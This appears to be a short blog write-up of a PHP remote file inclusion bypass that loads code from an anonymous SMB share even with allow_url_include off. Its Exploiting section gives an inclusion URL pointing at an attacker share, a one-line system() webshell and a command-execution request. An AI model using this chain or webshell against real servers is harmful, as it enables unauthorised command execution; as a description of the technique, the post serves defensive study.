File Inclusion vulnerability
In the PHP Configuration,"allow_url_include" wrapper by-default set to "Off" which instruct PHP not ot load remote HTTP or FTP urls.Hence prevent Remote File Inclusion attack.But PHP does not block SMB URL loading even if even if "allow_url_include" and "allow_url_fopen" both are set to "Off".These behavior of PHP can be abused to load remotely hosted PHP webshell from SMB share.
Attack scenario outline
When vulnerable PHP application code try to load PHP webshell from attacker controlled SMB share which should allow access to the file.Attacker need to configure SMB server with anonymous browsing access enable on it. So, once vulnerable application try to access PHP web shell from SMB share, SMB server will not ask for any credential and PHP code of web shell will be included by the vulnerable application.
Verification environment
allow_url_fopen = OFF
allow_url_include=off
PHP version=5.5.11
Running the Smbserver with anonymous
Exploiting
http://vulnerability_machine_ip/page.php?lang=\\exploit_ip\xxx\xx.php
We can add some php script(trojan.php) of system function (one sentence trojan) like
<?php system($_REQUEST[cmd])?>
If we want to utiliz the trojan we can send the package as below:
http://http://vulnerability_machine_ip/page.php?lang=\\exploit_ip\trojan.php&cmd=whoami
The machine will execute the command
标签:bypassing,trojan,php,remote,inclusion,url,allow,PHP,SMB From: https://www.cnblogs.com/lisenMiller/p/17971392